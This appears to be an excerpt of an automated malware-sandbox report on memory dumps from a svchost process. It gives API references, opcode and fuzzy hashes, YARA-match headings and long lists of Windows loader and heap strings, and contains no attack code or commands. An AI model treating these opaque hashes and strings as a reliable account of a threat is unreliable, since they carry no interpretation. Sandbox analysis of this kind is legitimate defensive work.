                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 88da014f75d25587c892d55418ede5ee0777c14e268e76cdb20823696d9e434e
                                                                    • Instruction ID: d2d3e40f83654d3533f48eb8caeba64e9b53db87628c8db2b709183d5970560f
                                                                    • Opcode Fuzzy Hash: 88da014f75d25587c892d55418ede5ee0777c14e268e76cdb20823696d9e434e
                                                                    • Instruction Fuzzy Hash: 4DE06DB6600609BBD610EE99DC44E9B33ADEFC9710F004019F908A7241D670B9108AB5

                                                                    Control-flow Graph

                                                                    control_flow_graph 182 243c8e3-243c91c call 24147a3 call 243d763 ExitProcess
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,1A777905,?,?,1A777905), ref: 0243C917
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: ec78b80b32e7219fb245775cf88c82d9812fcd126f57549b7c699f673255ac32
                                                                    • Instruction ID: 978fbc812de400992ce4fb49a26067e661d595ddfc4da816c17012e408f1e2d8
                                                                    • Opcode Fuzzy Hash: ec78b80b32e7219fb245775cf88c82d9812fcd126f57549b7c699f673255ac32
                                                                    • Instruction Fuzzy Hash: 8BE04F366006147BD110EB5ADC41F97776DDFC5710F00451AFA08A7244C67179118AB1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                                                    • Instruction ID: 7d1ed4588080eb7725c4eca6e90640f20d5bb3284c9a405960a42779ec48885f
                                                                    • Opcode Fuzzy Hash: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                                                    • Instruction Fuzzy Hash: 27B09B719415C5C5DE51F7604A09717790567D0705F55D061D7470645E4738C1D1F175
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: 2371700b5c1545f20fd5196aa1b9dab0777d37d5f9613346d179c9dc072266ef
                                                                    • Instruction ID: 03b83a44d7eefa6bf55b3245b0dbb06b31da802b795c93af175d81c80bb297ff
                                                                    • Opcode Fuzzy Hash: 2371700b5c1545f20fd5196aa1b9dab0777d37d5f9613346d179c9dc072266ef
                                                                    • Instruction Fuzzy Hash: 8F92CF716843419BE726DF24C880BABB7E9BF84758F04A92DFE94D7250D770E844CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-3089669407
                                                                    • Opcode ID: 5cf369781a12301532567ed3f6b99430941648d6b3d065950d9c6ca8a9459641
                                                                    • Instruction ID: 1cc7c0b0f4de865739b329656d70c4bbbb85d9dd33004903b22d12d1fab025c9
                                                                    • Opcode Fuzzy Hash: 5cf369781a12301532567ed3f6b99430941648d6b3d065950d9c6ca8a9459641
                                                                    • Instruction Fuzzy Hash: 7E8165B2DC12186F9B11FAD4DDD4EEEB7BEEB04740B559921FA05F7100E620ED188BA0
                                                                    Strings
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EA54E2
                                                                    • double initialized or corrupted critical section, xrefs: 02EA5508
                                                                    • Address of the debug info found in the active list., xrefs: 02EA54AE, 02EA54FA
                                                                    • 8, xrefs: 02EA52E3
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EA54CE
                                                                    • Thread identifier, xrefs: 02EA553A
                                                                    • Critical section address., xrefs: 02EA5502
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 02EA5543
                                                                    • Invalid debug info address of this critical section, xrefs: 02EA54B6
                                                                    • Critical section address, xrefs: 02EA5425, 02EA54BC, 02EA5534
                                                                    • undeleted critical section in freed memory, xrefs: 02EA542B
                                                                    • Critical section debug info address, xrefs: 02EA541F, 02EA552E
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EA540A, 02EA5496, 02EA5519
                                                                    • corrupted critical section, xrefs: 02EA54C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                    • API String ID: 0-2368682639
                                                                    Strings
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 02EA22E4
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 02EA25EB
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 02EA261F
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 02EA2409
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 02EA2506
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 02EA2602
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 02EA24C0
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 02EA2412
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 02EA2624
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 02EA2498
                                                                    • @, xrefs: 02EA259B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                    • API String ID: 0-360209818
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                    • API String ID: 0-3591852110
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                    • API String ID: 0-3532704233
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                    • API String ID: 0-1357697941
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    Strings
                                                                    • VerifierDebug, xrefs: 02EB8CA5
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 02EB8B8F
                                                                    • HandleTraces, xrefs: 02EB8C8F
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 02EB8A3D
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 02EB8A67
                                                                    • VerifierFlags, xrefs: 02EB8C50
                                                                    • VerifierDlls, xrefs: 02EB8CBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    • API String ID: 0-3223716464
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    • API String ID: 0-1109411897
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-523794902
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                    • API String ID: 0-4098886588
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-122214566
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-792281065
                                                                    Strings
                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 02E899ED
                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 02E89A01
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E89A11, 02E89A3A
                                                                    • apphelp.dll, xrefs: 02E26496
                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 02E89A2A
                                                                    • LdrpInitShimEngine, xrefs: 02E899F4, 02E89A07, 02E89A30
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-204845295
                                                                    • Opcode ID: 036a708aced3a4cc4dc063cf36317c296095cf545758b80626ca3ee09510eae7
                                                                    • Instruction ID: 7ccda8be7e0e37e55149f1b9a5ae4ee5356fd265c964ed72729978dd9c1dfc88
                                                                    • Opcode Fuzzy Hash: 036a708aced3a4cc4dc063cf36317c296095cf545758b80626ca3ee09510eae7
                                                                    • Instruction Fuzzy Hash: 2C510B716C83149FE724EF24C881BAB77E9FB84744F409D59F98A97291D730E908CB92
                                                                    Strings
                                                                    • LdrpInitializeImportRedirection, xrefs: 02EA8177, 02EA81EB
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 02EA8181, 02EA81F5
                                                                    • LdrpInitializeProcess, xrefs: 02E6C6C4
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E6C6C3
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 02EA81E5
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 02EA8170
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-475462383
                                                                    • Opcode ID: 803edcbe512b595f9c155d7f092d81d40c2469e8828df00b4f51fae07a3dc1a7
                                                                    • Instruction ID: 7e997125801ddba5cba41a2f4715a8f7f19c185163152fb863f0cb19e2be06c8
                                                                    • Opcode Fuzzy Hash: 803edcbe512b595f9c155d7f092d81d40c2469e8828df00b4f51fae07a3dc1a7
                                                                    • Instruction Fuzzy Hash: F83139717C43459FD214EF28DC49E2BB7A5EF80B58F04A9A8FC855B291D720EC04CBA2
                                                                    Strings
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02EA2178
                                                                    • SXS: %s() passed the empty activation context, xrefs: 02EA2165
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02EA21BF
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02EA219F
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02EA2180
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 02EA2160, 02EA219A, 02EA21BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    • API String ID: 0-861424205
                                                                    • Opcode ID: 6fb3b2e8156807195d924b01dd08c0941a7d539df2cc712730dd15c0ff266423
                                                                    • Instruction ID: 8b17c0282aac17996147797ae05f37ad687ad95337f273913033374b0ad197ab
                                                                    • Opcode Fuzzy Hash: 6fb3b2e8156807195d924b01dd08c0941a7d539df2cc712730dd15c0ff266423
                                                                    • Instruction Fuzzy Hash: BD31D432EC022467FB218A958C55FABB769DFA4B98F05E069BF057B140D370AE00C6E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                    • API String ID: 0-3393094623
                                                                    • Opcode ID: 9d1c0543d36e91e57a49b0d491456744b51d18ba88766bac72e8880ef4de6bb3
                                                                    • Instruction ID: 77dfc8e72ffabb7e12291efc72f55223e31fd4b6de8e31e09c10a78d64ef2857
                                                                    • Opcode Fuzzy Hash: 9d1c0543d36e91e57a49b0d491456744b51d18ba88766bac72e8880ef4de6bb3
                                                                    • Instruction Fuzzy Hash: B1028D71588341CFD720CF64D184BABB7E5BF84748F40E91EE989AB252DB70D948CB92
                                                                    APIs
                                                                      • Part of subcall function 02E72DF0: LdrInitializeThunk.NTDLL ref: 02E72DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E70D74
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 1404860816-0
                                                                    • Opcode ID: 357d34c4940ac10fa625930ac08a2441fc67bc3bf3e8afac115ea19936cdc7a7
                                                                    • Instruction ID: a3113d27fca8fe09741fb51996d513a7e09bce9baee488469f75c4f101b15c48
                                                                    • Opcode Fuzzy Hash: 357d34c4940ac10fa625930ac08a2441fc67bc3bf3e8afac115ea19936cdc7a7
                                                                    • Instruction Fuzzy Hash: FF426A71940715DFDB20CF24C890BAAB7F5FF44304F1495AAE989EB242E770AA84CF60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                    • API String ID: 0-2518169356
                                                                    • Opcode ID: 8c05d1c4668f9d5dfeeef2432b8e1a65f5ec5b6c603538f525806d3989f653b9
                                                                    • Instruction ID: 08d41552eecf18ea3349ecd50b3b871add973b02f8706144b63d442e5d8f3267
                                                                    • Opcode Fuzzy Hash: 8c05d1c4668f9d5dfeeef2432b8e1a65f5ec5b6c603538f525806d3989f653b9
                                                                    • Instruction Fuzzy Hash: 9591C072D40A19DBCB22CFA9C880AEFB7B1EF49314F999169E815E7390D735D901CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: cb30099d282e75e3a66061578f89011db9dc9830d70198321133ed7d8aa75de7
                                                                    • Instruction ID: d5435aaa8a3b7328e284fafcb104a7c462e55d385f867f39ba6c49fae12b0c73
                                                                    • Opcode Fuzzy Hash: cb30099d282e75e3a66061578f89011db9dc9830d70198321133ed7d8aa75de7
                                                                    • Instruction Fuzzy Hash: D8138C70A40655CFDB25CF68D8907A9FBF2BF49308F14D1A9E849AB381DB34A945CF90
                                                                    Strings
                                                                    • SsHd, xrefs: 02E4A885
                                                                    • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 02E97D03
                                                                    • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 02E97D39
                                                                    • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 02E97D56
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                    • API String ID: 0-2905229100
                                                                    • Opcode ID: f097438ae089462bc947b22b264dcc1beca7411642244af87ba932376aed7ef9
                                                                    • Instruction ID: 7c681bbdf30739c474523678866e3017e324dded5fcd7366dfb0ed3854c6c7e8
                                                                    • Opcode Fuzzy Hash: f097438ae089462bc947b22b264dcc1beca7411642244af87ba932376aed7ef9
                                                                    • Instruction Fuzzy Hash: 9DD1B171A802199BDF24CF98E8D07EDB7B5FF48328F19A06AE945AB341D7319845CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
